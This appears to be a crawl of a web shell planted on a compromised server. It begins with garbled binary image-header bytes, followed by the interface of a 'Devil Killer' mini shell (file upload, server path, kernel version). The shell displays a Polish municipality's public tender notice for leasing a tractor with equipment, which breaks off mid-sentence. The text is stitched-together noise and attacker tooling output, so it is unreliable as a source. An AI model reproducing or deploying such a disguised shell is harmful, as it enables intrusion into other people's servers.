JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241007/0053350801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Leasing operacyjny z opcją wykupu fabrycznie nowego ciągnika rolniczego wraz<br/>z wyposażeniem </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA UŚCIE GORLICKIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 491892759</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">80</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Uście Gorlickie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-315</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL218 - Nowosądecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@usciegorlickie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.usciegorlickie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Leasing operacyjny z opcją wykupu fabrycznie nowego ciągnika rolniczego wraz<br/>z wyposażeniem </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-86bb4937-25aa-4b3f-ad8f-89037ab5f6cb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00533508</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00061390/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Leasing operacyjny z opcją wykupu fabrycznie nowego ciągnika rolniczego wraz z wyposażeniem</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-86bb4937-25aa-4b3f-ad8f-89037ab5f6cb <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>Identyfikator (ID) postępowania na Platformie e-Zamówienia: ocds-148610-86bb4937-25aa-4b3f-ad8f-89037ab5f6cb</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub w konkursie.<br/>Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub w konkursie, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1)	administratorem Pani/Pana danych osobowych jest Gmina Uście Gorlickie;<br/>2)	inspektorem ochrony danych osobowych w Gminie Uście Gorlickie jest Pan Kamil Kędzierski, e-mail: iod@usciegorlickie.pl, telefon: (+48) 733 040 110;<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego;<br/>4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp;<br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>8)	posiada Pani/Pan:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9)	nie przysługuje Pani/Panu:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BPŚ.271.10.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa w formie leasingu operacyjnego,<br/>w rozumieniu art. 709 z indeksem 1 ustawy z dnia 23 kwietnia 1964 r. – Kodeks cywilny, fabrycznie nowego ciągnika rolniczego wraz z wyposażeniem o następującej specyfikacji technicznej:<br/>Ciągnik rolniczy<br/>Dane sprzętu	Wymagany przez Zamawiającego<br/>Rok produkcji	Fabrycznie nowy rocznik 2024<br/>Typ silnika	Wysokoprężny, z układem wtrysku Common Rail, turbosprężarką, chłodzony cieczą, IV Cylindrowy, normą spalin Stage V, wentylatorem wiskotycznym<br/>Moc znamionowa silnika	Min. 120 KM<br/>Pojemność minimum	4400 cm3<br/>Skrzynia biegów	Z rewersem elektrohydraulicznym Powershuttle, ilość przełożeń- przód/tył minimum 24x24, min prędkość skrzyni 40 km/h ECO<br/>Rodzaj napędu	4WD załączane elektrohydraulicznie z przycisku,<br/>Tylny WOM	Załączanie AUTO, minimum prędkości WOM 540/540E /1000 obr/min, sterowanie zewnętrzne WOM na błotniku	<br/>Tylny TUZ<br/>	Dolne ramiona kategorii II z hakami, maksymalny udźwig podnośnika minimum 5,5 T, sterowanie zewnętrzne na błotniku.<br/>Przedni TUZ	Udźwig min 2,3 T z funkcja pływającą + wyprowadzenie I sekcji hydrauliki<br/>Zaczepy	Zaczep rolniczy rolecie przesuwny automatyczny sterowany w kabinie + dolny zaczep + piton-fix<br/>Hydraulika	Pompa hydrauliczna o wydajności min 80 l/min, mechaniczne zawory tylne nie mniej niż 6+1, wolny spływ<br/>Złącza pneumatyczne dla układów hamulcowych przyczep		dwuprzewodowe<br/>Kabina	Kabina komfortowa amortyzowana mechanicznie z podłokietnikiem i Multicontrolerem, 4 słupkowa z klimatyzacją i ogrzewaniem, wyświetlaczem funkcji ciągnika na prawym słupku kabiny, 2 drzwi, tylna szyba z siłownikami gazowymi, siedzenie kierowcy obrotowe z amortyzacją pneumatyczną, siedzenie pasażera składane z pasami bezpieczeństwa i homologacją, spryskiwacz przedniej i tylnej szyby wraz z wycieraczkami, szyberdach, klimatyzowany schowek instalacja radiowa z radiem, lampa sygnalizacyjna pomarańczowa<br/>Układ kierowniczy	Hydrauliczny<br/>Hamulce robocze	Tarczowe mokre sterowane hydraulicznie<br/>Rozstaw osi min.	2 400 mm<br/>Max długość	5 000 mm<br/>Pojemność zbiornika paliwa / AdBlue min	180/19 L<br/>Minimalna masa własna bez obciążników	5500 kg<br/>Koła przód / tył minimum	KP 440/65 R28 KT 540/65 R38<br/>Wyposażenie	Apteczka, trójkąt ostrzegawczy, gaśnica,<br/>Wskaźniki	Licznik motogodzin, wskaźnik obrotów, poziomu paliwa, wskaźnik temperatury cieczy chłodzącej <br/>i ciśnienia oleju<br/>Oświetlenie	Pakiet 8 świateł LED<br/>2 przednie główne światła, 2 przednie przeciwmgielne, 2 reflektory robocze z przodu, 3(4) reflektory robocze<br/>z tyłu, światła ostrzegawcze i kierunkowskazy<br/><br/>Dokumentacja	Świadectwo zgodności WE – umożliwiające rejestrację ciągnika na terenie Polski – ilość miejsc w kabinie 2<br/>Instrukcja obsługi w języku polskim<br/>Gwarancja zbywcy	Minimum 24 miesiące od dostawy<br/><br/>Ładowacz czołowy<br/>Dane sprzętu	Wymagany przez Zamawiającego<br/>Rok produkcji	Fabrycznie nowy min. 2024 r<br/>Udźwig	Udźwig minimum 1,6 T<br/>Sterowanie	Sterowanie elektroniczne Joystickiem z rozdzielaczem III sekcyjnym<br/>Wysokość podnoszenia min	3,4 m<br/>Mocowanie	Za pomocą konstrukcji wsporczej, system zapinania wysięgnika najazdowy<br/>Zapotrzebowanie mocy	Min. 100 km<br/><br/>Dodatkowe wyposażenie:		Amortyzator antywstrząsowy<br/>	Widły do palet minimum 2,0 T<br/>	Szufla walcowana szer. 2,2 pojemność minimum 1,26 m3<br/><br/>Gwarancja zbywcy	Minimum 24 miesiące od dostawy<br/><br/>Pług śnieżny<br/>Dane sprzętu	Wymagany przez Zamawiającego<br/>Rok produkcji	Fabrycznie nowy min. 2024 r<br/>Rodzaj pługa	Pług do odśnieżania składany mocowany do ciągnika rolniczego<br/>Mocowanie do ciągnika rolniczego	Przystosowany do montażu w trzypunktowym układzie zawieszenia z przodu ciągnika na TUZ-ie<br/>Szerokość lemiesza wyprostowanego	Minimum 3,2 m<br/>Wysokość lemiesza	od 0,5 do 0,8 m<br/>Elementy robocze	Hydraulicznie sterowane lemiesze z wymienną gumową listwą zgarniającą (prawy, lewy), kopiowanie terenu ruchoma rama, amortyzacja lemiesza, ślizgi<br/><br/>Sposoby odgarniania	Co najmniej cztery pozycje robocze<br/>	w prawo<br/>	w lewo<br/>	symetrycznie prawo – lewo<br/>	zbieranie do środka<br/>Kąty wychylenia lemieszy	Prawo / lewo - do 30°<br/>Gwarancja zbywcy	Min. 24 miesiące od dostawy<br/><br/>Posypywarka<br/>Dane sprzętu	Wymagany przez Zamawiającego<br/>Rok produkcji	Fabrycznie nowa min. 2024 r<br/>Rodzaj	Posypywarka samozaładowcza zawieszana na TUZ kat II<br/>Pojemność	Min 1,0 m3<br/>Specyfikacja	Posypywarka wyposażona w walec kruszący oraz walec rozsiewający<br/>Szerokość rozrzutu 2,0 m<br/>Wyposażenie	Oświetlenie drogowe LED, sterowanie ilością wysypu mechaniczne<br/>Gwarancja zbywcy	Min. 24 miesiące od dostawy<br/><br/>Kosiarka bijakowa na ramieniu wysięgnikowym<br/>Dane sprzętu	Wymagany przez Zamawiającego<br/>Rok produkcji	Fabrycznie nowa min. 2024 r<br/>Ramię wysięgnikowe	Zasięg ramienia min 5,5 m, sterowanie mechaniczne linkowe<br/>Mocowanie do ciągnika rolniczego	Przystosowany do montażu w trzypunktowym układzie zawieszenia z tyłu ciągnika na TUZ-ie<br/>Wyposażenie	Chłodnica oleju, wał napędowy, stabilizatory, sterowanie za pomocą rozdzielacza elektrycznego<br/>Specyfikacja	Masa własna minimum 900 kg, szerokość transportowa maksimum 2,1 m<br/>Wyposażenie dodatkowe	Głowica kosząca minimum 125 cm z młotkami bijakowymi i silnikiem przymocowanym od góry<br/>Pilarka tarczowa minimum 190 cm, minimum 3 tarcze tnące<br/>Gwarancja zbywcy	Min. 24 miesiące od dostawy<br/><br/>Rębak bębnowy<br/>Dane sprzętu	Wymagany przez Zamawiającego<br/>Rok produkcji	Fabrycznie nowa min. 2024 r<br/>Specyfikacja	Rębak bębnowy napędzany z WOM ciągnika, wyposażony w noże ze stali trudnościeralnej min 2 sztuki, zapotrzebowanie mocy ciągnika min 50 km<br/>Średnica bębna tnącego minimum 520 mm, waga bębna tnącego minimum 60 kg<br/>Min. średnica cięcia gałęzi (świeże miękkie drewno): 140 mm<br/>Min. średnica cięcia gałęzi (świeże twarde drewno): 130 mm<br/>Min. średnica cięcia gałęzi (suche twarde drewno): 120 mm<br/>Mocowanie do ciągnika rolniczego	Przystosowany do montażu w trzypunktowym układzie zawieszenia z tyłu ciągnika na TUZ-ie<br/>Wyposażenie dodatkowe	Wałek WOM, zaczep przyczepy,<br/>Gwarancja zbywcy	Min. 24 miesiące od dostawy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">16000000-5 - Maszyny rolnicze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">16311100-9 - Kosiarki do pielęgnacji trawników, zieleni parkowej lub terenów sportowych</p> <p class="mb-0">34144440-4 - Piaskarki</p> <p class="mb-0">16700000-2 - Ciągniki</p> <p class="mb-0">43250000-0 - Ładowarki czołowe</p> <p class="mb-0">43313100-1 - Pługi odśnieżające lemieszowe</p> <p class="mb-0">43810000-4 - Urządzenia do obróbki drewna</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Podstawę obliczenia ceny stanowią wymogi określone w Rozdziale III SWZ <br/>2.	Cena musi wynikać z kalkulacji sporządzonej zgodnie ze wzorem określonym w załączniku nr 1 do SWZ, przy czym:<br/>1)	wysokość pierwszej raty wynosić powinna 5 % łącznej ceny za wykonanie zamówienia;<br/>2)	cena wykupu maszyn stanowiących przedmiot leasingu wynosić powinna 1 % łącznej ceny za wykonanie zamówienia.<br/>3.	Cena oferty musi zawierać wszystkie koszty, związane z realizacją zamówienia.<br/>4.	Wartości cenowe powinny być podane w ofercie cyfrowo, z dokładnością do dwóch miejsc po przecinku. W przypadku braku cyfr po przecinku Zamawiający przyjmuje, że występują zera. W przypadku podania większej ilość cyfr po przecinku Zamawiający dokona zaokrąglenia do dwóch miejsc po przecinku wg zasad ogólnych w tym zakresie.<br/>5.	Wszystkie wartości cenowe, w ramach niniejszego postępowania, określane są w złotych. Wszystkie płatności realizowane będą wyłącznie w złotych, zgodnie z obowiązującymi przepisami. Zamawiający nie przewiduje rozliczania w walutach obcych.<br/>6.	W cenie oferty uwzględnia się podatek od towarów i usług oraz podatek akcyzowy, jeżeli na podstawie odrębnych przepisów sprzedaż towaru (usługi) podlega obciążeniu podatkiem od towarów i usług oraz podatkiem akcyzowym.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowy okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	Wykonawca musi wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – to w tym okresie, wykonał co najmniej jedną dostawę, w formie leasingu operacyjnego z opcją wykupu, ciągnika rolniczego lub ciągnika rolniczego wraz z wyposażeniem, o wartości nie mniejszej niż 350 000,00 zł.<br/>2.	W przypadku, gdy Wykonawca powoła się na wykonanie dostawy o wartości wyrażonej w walucie innej niż złoty polski, Zamawiający przeliczy ją na złoty polski według średnich kursów walut NBP opublikowanych w dniu, w którym wykonano dostawę. W przypadku braku publikacji kursów walut NBP w dniu, w którym wykonano dostawę, Zamawiający dokona przeliczenia według kursu ostatnio ogłoszonego przed dniem, w którym wykonano dostawę.<br/>3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek, o którym mowa w pkt 1 zostanie uznany za spełniony, jeżeli co najmniej jeden z Wykonawców wykonał dostawę o wartości wskazanej w pkt 1 i zrealizuje dostawę 